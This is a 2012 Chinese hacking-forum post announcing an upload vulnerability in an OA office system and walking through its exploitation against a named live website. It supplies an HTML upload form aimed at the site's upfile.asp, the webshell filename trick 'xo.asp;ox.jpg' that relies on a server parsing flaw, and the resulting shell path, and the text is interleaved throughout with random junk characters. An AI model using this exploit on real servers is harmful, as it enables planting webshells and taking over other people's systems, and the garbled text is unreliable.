中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
# f% ^+ l1 S) g  I8 M# o# ?" Q& v$ |: E) P) j
系统介绍:
5 Q/ S3 A. c' W0 r( Y  S* J# x# Q& c' b  R* n& F5 N# u
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。8 l, p2 o7 l# _; X+ {! d
$ _8 N7 c7 t7 C- _" R- e
主要功能:" t& {" E/ w' |: ^, E4 _
公司通告
/ o' B4 o: H5 w7 A% C& Z3 k工作计划
5 O" x7 b& Y- q+ x. }3 C. ~' U. `通讯助理
2 p6 ^7 {) O- X) t) R& V客户资源 ( b0 q. A. c( f" G$ A
我的公文
1 s' b7 M1 b1 r7 O  c公文传阅
8 r( f& K) q- @公共资源 9 C  I5 m) ]0 U/ ^8 W
资源预约
% _! H. t, C0 E今日考勤 7 x9 M4 |5 Y  T$ z) G$ j
个人计划 ' _  k) \  h+ D8 M0 M3 ~
个人通讯录 * C7 U4 Z7 D* h0 }' M* Q# B
个人基本档案 % V, F( J1 {* M: _& S6 g8 {, i0 b
未读邮件
2 F  h+ \, l1 y& \! O' b发邮件
2 O6 c. r8 c* a5 F收件夹
" h/ a: [9 t/ D寄件夹 , K# e( h4 O3 l( I7 h
网络硬盘
7 N0 L% t- Q4 K6 Q. |% a7 R网络会议 6 Q! I# E/ L0 y; O8 y
网络调查
8 i6 o/ J: m* p" G! f交流论坛4 Y8 Y. o( J' b: R) I7 F

# {/ d$ C5 X+ l) H+ A+ Q有兴趣测试的朋友可以下源码看看
/ ?" E/ |- v% i) |* }% n6 U! W7 ?  k
, y/ x: C9 X0 X  }9 S源码下载:# D1 l. k1 M- H9 Z; O% {
6 k  [4 U4 f" ~) Q8 A& m& g2 w4 ]
http://www.mycodes.net/30/4750.htm
- s  K4 C- Q- k- r3 h
, t9 ^1 S  y' ]1 k  E% ?9 o; j漏洞介绍:
0 Q8 k. a8 s7 J* h- V: u, n& j7 E* F+ B$ X+ q
由upfile.asp上传文件漏洞引起
' d6 V2 P5 a5 ]& K% W  x8 d: h3 R& |) T) R, _6 V8 R& `
测试方法:
: }& v. o: @/ x# V( S) }* k- i2 ?1 M  J2 ^, F. L5 ^
使用名小子上传http://www.itlynn.com/upfile.asp即可# ^* j, r' M4 X. @/ Z2 f$ @

5 R0 ?( \/ d& Q6 ?2 v3 Q如果upfile.asp文件被删除不存在。& i! F9 d; k  ]1 w2 H6 K& B5 T* N  E! c

; q! i4 \7 {! D6 u  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
1 |/ F$ k& L# J. ]  f
) T! G( g4 S2 p$ \, \' z如果存在那么将如下代码保存为upfile.html。
* s1 \( k, m6 L$ N% y& n  ]( }$ J" i! F+ H% s
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp- T& y# F5 G% W

: Q0 v5 x# d* V) M6 s: R6 c, K( |
' K; s% B! t1 A8 @
5 U- {( M6 n! Z! e01 <table border='0' align="center" cellpadding="5"> 0 o3 a; t9 E9 r4 w" ]/ x- ^
% m, i. p* z4 b6 h: \
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 2 x# t- W- l8 a3 w& K

" i4 f7 z0 j) T: Y( D) N03 <tr> 7 `! F+ @2 Q7 Q: M$ w# @

9 n  o% l6 L7 f/ P& y1 E' v+ {/ ]6 I- `2 i04             <td>报错:</td> : i3 e" X3 f8 C! }4 q. I- H( j$ `0 V+ B
+ q9 H0 K7 ^1 ~# \' u
05             <td><input type='radio' name='errnumber' value='0'> $ P0 a* ^5 m. E+ Q

" b; x1 h) ~0 T; V+ S6 |- c: f06               自动更名 - K' J- h4 ~8 r5 X0 m; e
$ R# g' H  x% B2 m; }& F9 X) [% P
07               <input type='radio' name='errnumber' value='1' checked>
# I2 s3 b9 {; ^/ m0 H$ T
7 W+ w- ~( s: \08               报错方式
- S; M4 h5 s$ L0 {4 O2 z
( w5 I. |) ]7 F; M09               <input type='radio' name='errnumber' value='2'>
' i, e$ e+ y3 g& P) z. j% B! N" X6 d* x! l
10               直接覆盖</td> 4 F' l% g; j8 F2 U
8 E& F. q! Y; V& ^1 @3 U
11           </tr> ; s* }+ O5 k7 p+ l
3 P1 v: a6 M/ {
12           <tr>
- x' c1 |3 h1 C0 @5 p8 L& I
+ A5 h- ]1 r7 _& \13             <td>主题:</td>   n# n% I2 u  O& q+ L% e
& z2 r0 E: A0 n  a. k% [$ X8 l( b
14             <td><input type='text' name='filename' size='30'></td> # K' U' K) S$ x: u1 p9 y, _

" d- P. G5 E6 t0 z4 z* h15           </tr>
! I' f( e4 e; _0 i
" d' G9 L. ^) F5 U& [. C16           <tr>
9 s9 R1 s! v- f/ @5 Y  {8 a' v. ]  d4 O+ h! D( L% T# z) f
17             <td>文件:</td>
+ Y2 q% y* N/ U% R. s2 J6 ~  l+ r9 ]8 z
18             <td><input type="file"name="fruit"size="30"></td> , s  _$ |4 I1 k4 B2 k% {$ q% V

) l+ g' R9 X+ K4 P3 N& V19           </tr>
; a, N# p+ p( G' u( T5 R; X2 r) a" {& R. B, t- y, C9 U+ X5 V) R
20           <tr> 8 S% a6 v) \0 V) m: x* s

; {0 o. d) d% b6 U7 {* W# H21             <td valign='top'>简介:</td> 1 \9 p8 w4 Y, r* Y) M) o% ]

$ g0 i5 B9 A- W% R/ C  f22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
3 V! e- L* T8 l9 |) L- v6 ]2 N& c/ i+ W, U8 v. l2 B5 d1 k% a
23           </tr> ) J: W8 X+ j4 J  P" i+ r4 n$ A3 u

) [  d; M7 g4 _* K5 c" @24   : d) o" V# `# \5 x( v% A
4 i& i5 c# g& j8 T$ L; F! X$ _
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ! \2 K* K# C/ o$ Z! }& j/ O* u
4 V0 |- z1 E' y0 x
26           </tr>
5 l2 _2 P$ B$ ]+ {
2 n* W/ {; a5 g2 X/ ]+ c2 P27         </form>
- f$ b2 G. D3 E1 d. n( A$ C! i
. n4 M& t3 o; }' W- U2 m% I然后打开上传一个文件名为xo.asp;ox.jpg的文件。
3 ~/ U( r5 @7 t! \* U  ?( v0 V2 N; j+ G, U9 b7 z' b4 u, x# y. ^
& d& f# X8 e+ v# [

- e- I* v# `& l1 o5 o! ]上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
- U3 S- c, O1 |& F: L
3 J! M/ Z4 s' e) @% z) s此漏洞需要配合解析漏洞利用。
4 Q6 A: X( g1 q5 Z: @( ?. u+ n; X5 w. V





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2